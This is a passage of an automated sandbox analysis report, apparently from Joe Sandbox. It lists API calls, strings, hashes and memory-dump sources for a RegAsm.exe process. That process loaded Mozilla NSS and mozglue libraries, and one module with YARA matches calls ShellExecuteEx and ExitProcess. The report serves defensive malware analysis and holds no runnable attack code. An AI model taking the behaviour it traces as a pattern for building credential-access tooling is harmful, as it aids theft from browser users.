                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EE60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE6D
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE92
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EEA5
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7EEB4
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7EEBB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EEC7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EECF
                                                                                      • Part of subcall function 6CC7DE60: GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                                      • Part of subcall function 6CC7DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                                      • Part of subcall function 6CC7DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                                      • Part of subcall function 6CC7DE60: free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                                      • Part of subcall function 6CC7DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EF1E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF2B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF59
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EFB0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFBD
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFE1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EFF8
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F000
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F02F
                                                                                      • Part of subcall function 6CC7F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                                      • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                                      • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause, xrefs: 6CC7F008
                                                                                    • [I %d/%d] profiler_stop, xrefs: 6CC7EED7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                    • API String ID: 16519850-1833026159
                                                                                    • Opcode ID: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                                    • Instruction ID: 87cc19eaa7ff1862e149d7e13b61f96da5ddd9fa91974ee0a6cb559ff2303005
                                                                                    • Opcode Fuzzy Hash: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                                    • Instruction Fuzzy Hash: FE51363E6002209FDB105BE9D8587AAB7B4EB47328F14052AF91583F41FB754804CBBA
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBE804), ref: 6CC6D047
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC6D093
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC6D0A6
                                                                                    • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CCBE810,00000040), ref: 6CC6D0D0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7B8,00001388), ref: 6CC6D147
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE744,00001388), ref: 6CC6D162
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE784,00001388), ref: 6CC6D18D
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7DC,00001388), ref: 6CC6D1B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                    • API String ID: 2957312145-326518326
                                                                                    • Opcode ID: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                                    • Instruction ID: c50c1e093bbb7c57f3f528629ea322eb351c608e084e2fffade4dd2aab1bc9e8
                                                                                    • Opcode Fuzzy Hash: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                                    • Instruction Fuzzy Hash: 4581D170B042109BEB009FEADA94B6937B4FB46B04F2405AEE901E7F80F7759805CBD9
                                                                                    APIs
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CD96943
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CD96957
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CD96972
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CD96983
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CD969AA
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CD969BE
                                                                                      • Part of subcall function 6CD96910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CD969D2
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CD969DF
                                                                                      • Part of subcall function 6CD96910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CD96A5B
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD96D8C
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96DC5
                                                                                    • free.MOZGLUE(?), ref: 6CD96DD6
                                                                                    • free.MOZGLUE(?), ref: 6CD96DE7
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD96E1F
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96E4B
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96E72
                                                                                    • free.MOZGLUE(?), ref: 6CD96EA7
                                                                                    • free.MOZGLUE(?), ref: 6CD96EC4
                                                                                    • free.MOZGLUE(?), ref: 6CD96ED5
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96EE3
                                                                                    • free.MOZGLUE(?), ref: 6CD96EF4
                                                                                    • free.MOZGLUE(?), ref: 6CD96F08
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96F35
                                                                                    • free.MOZGLUE(?), ref: 6CD96F44
                                                                                    • free.MOZGLUE(?), ref: 6CD96F5B
                                                                                    • free.MOZGLUE(00000000), ref: 6CD96F65
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CD9781D,00000000,6CD8BE2C,?,6CD96B1D,?,?,?,?,00000000,00000000,6CD9781D), ref: 6CD96C40
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CD9781D,?,6CD8BE2C,?), ref: 6CD96C58
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CD9781D), ref: 6CD96C6F
                                                                                      • Part of subcall function 6CD96C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CD96C84
                                                                                      • Part of subcall function 6CD96C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CD96C96
                                                                                      • Part of subcall function 6CD96C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CD96CAA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96F90
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD96FC5
                                                                                    • PK11_GetInternalKeySlot.NSS3 ref: 6CD96FF4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                    • String ID:
                                                                                    • API String ID: 1304971872-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411CDD
                                                                                    • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                    • ExitProcess.KERNEL32 ref: 00411D0A
                                                                                    • strtok_s.MSVCRT ref: 00411D21
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitH_prologProcessstrtok_s
                                                                                    • String ID: block
                                                                                    • API String ID: 3745986650-2199623458
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CD84CF3
                                                                                    • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD84D28
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD84D37
                                                                                      • Part of subcall function 6CE6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE6D963
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD84D4D
                                                                                    • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CD84D7B
                                                                                    • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD84D8A
                                                                                    • PR_LogPrint.NSS3(?,00000000), ref: 6CD84DA0
                                                                                    • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CD84DBC
                                                                                    • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CD84E20
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Print$L_strncpyz$L_strcatn
                                                                                    • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nl
                                                                                    • API String ID: 1003633598-534071768
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                                      • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                                      • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                                      • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                                      • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC46017
                                                                                      • Part of subcall function 6CC34310: moz_xmalloc.MOZGLUE(00000010,?,6CC342D2), ref: 6CC3436A
                                                                                      • Part of subcall function 6CC34310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC342D2), ref: 6CC34387
                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                                    • GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC4605D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC460CC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                    • String ID: GeckoMain
                                                                                    • API String ID: 3711609982-966795396
                                                                                    APIs
                                                                                      • Part of subcall function 6CC331C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                                      • Part of subcall function 6CC331C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                                      • Part of subcall function 6CC331C0: FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                                      • Part of subcall function 6CC331C0: __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                                      • Part of subcall function 6CC331C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                                      • Part of subcall function 6CC331C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                                      • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 3361784254-3880535382
                                                                                    APIs
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC48007
                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC4801D
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC4802B
                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC4803D
                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC4808D
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC4809B
                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC480B9
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC480DF
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480ED
                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480FB
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4810D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC48133
                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC48149
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC48167
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC4817C
                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC48199
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 2721933968-0
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96694
                                                                                    • GetThreadId.KERNEL32(?), ref: 6CC966B1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC966B9
                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC966E1
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96734
                                                                                    • GetCurrentProcess.KERNEL32 ref: 6CC9673A
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF618), ref: 6CC9676C
                                                                                    • GetCurrentThread.KERNEL32 ref: 6CC967FC
                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC96868
                                                                                    • RtlCaptureContext.NTDLL ref: 6CC9687F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                    • String ID: WalkStack64
                                                                                    • API String ID: 2357170935-3499369396
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DF7D
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DF8A
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DFC9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7DFF7
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E000
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                                    • free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC7E00E
                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6CC7DE83
                                                                                    • <none>, xrefs: 6CC7DFD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                    • API String ID: 1281939033-809102171
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00412830
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412BFF
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
